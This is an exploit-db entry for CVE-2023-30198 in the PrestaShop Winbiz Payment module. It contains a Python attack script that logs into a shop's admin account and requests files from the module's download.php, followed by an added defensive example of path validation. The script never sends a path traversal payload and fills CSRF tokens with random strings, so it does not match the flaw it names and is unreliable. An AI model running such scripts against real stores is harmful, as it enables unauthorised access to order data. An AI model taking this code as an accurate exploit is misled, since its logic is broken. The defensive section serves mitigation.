PrestaShop Winbiz Payment module – Improper Limitation of a Pathname to a Restricted Directory

  • Author: Amirhossein Bahramizadeh
    Date: 2023-06-26
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51545/
  • # Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
    # Date: 2023-06-20
    # Dork: /modules/winbizpayment/downloads/download.php
    # country: Iran
    # Exploit Author: Amirhossein Bahramizadeh
    # Category : webapps
    # Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html
    # Version: 17.1.3 (REQUIRED)
    # Tested on: Windows/Linux
    # CVE : CVE-2023-30198
    
    import requests
    import string
    import random
    
    # The base URL of the vulnerable site
    base_url = "http://example.com"
    
    # The URL of the login page
    login_url = base_url + "/authentication.php"
    
    # The username and password for the admin account
    username = "admin"
    password = "password123"
    
    # The URL of the vulnerable download.php file
    download_url = base_url + "/modules/winbizpayment/downloads/download.php"
    
    # The ID of the order to download
    order_id = 1234
    
    # The path to save the downloaded file
    file_path = "/tmp/order_%d.pdf" % order_id
    
    # The session cookies to use for the requests
    session_cookies = None
    
    # Generate a random string for the CSRF token
    csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))
    
    # Send a POST request to the login page to authenticate as the admin user
    login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
    session = requests.Session()
    response = session.post(login_url, data=login_data)
    
    # Save the session cookies for future requests
    session_cookies = session.cookies.get_dict()
    
    # Generate a random string for the CSRF token
    csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))
    
    # Send a POST request to the download.php file to download the order PDF
    download_data = {"id_order": order_id, "csrf_token": csrf_token}
    response = session.post(download_url, cookies=session_cookies, data=download_data)
    
    # Save the downloaded file to disk
    with open(file_path, "wb") as f:
        f.write(response.content)
    
    # Print a message indicating that the file has been downloaded
    print("File downloaded to %s" % file_path)
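The weakness named in the title (CWE-22, improper limitation of a pathname to a restricted directory) is mitigated by never letting a request choose a path outside the intended download directory. The following is an added defensive example, not code from the exploit-db entry or from the vendor's module; the download root, the `order_<id>.pdf` naming scheme and the sample requests are constructed assumptions.

```python
import os
import re

# Hypothetical download root; the real module's directory layout is not known.
DOWNLOAD_ROOT = "/srv/shop/modules/winbizpayment/downloads"

# Allow-list: a flat file name of safe characters ending in .pdf (no separators,
# no dot segments, so ".." can never appear).
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.pdf$")


def resolve_download_path(root, requested_name):
    """Return the canonical path of requested_name inside root, or None if the
    request is rejected. Two independent checks are applied: the allow-list
    on the name and a canonical-path containment check, so a bypass of one
    still has to get past the other."""
    if not isinstance(requested_name, str) or not SAFE_NAME.fullmatch(requested_name):
        return None
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, requested_name))
    # realpath() collapses '..' and symlinks; the result must still sit under root.
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate


def order_pdf_path(root, id_order):
    """Derive the file name from a validated integer order id instead of a
    user-supplied name; the traversal surface disappears entirely. Ownership
    of the order (is this customer allowed to see it?) is a separate check
    the caller still has to perform."""
    if not isinstance(id_order, int) or isinstance(id_order, bool) or id_order <= 0:
        return None
    return resolve_download_path(root, "order_%d.pdf" % id_order)


if __name__ == "__main__":
    # Constructed sample requests: one legitimate name, then malformed ones
    # that the allow-list or the containment check must reject.
    for name in ["order_1234.pdf", "../../other/file.pdf", "/tmp/file.pdf", "order.txt"]:
        print("%-25s -> %s" % (name, resolve_download_path(DOWNLOAD_ROOT, name)))
    print("order 1234 ->", order_pdf_path(DOWNLOAD_ROOT, 1234))
```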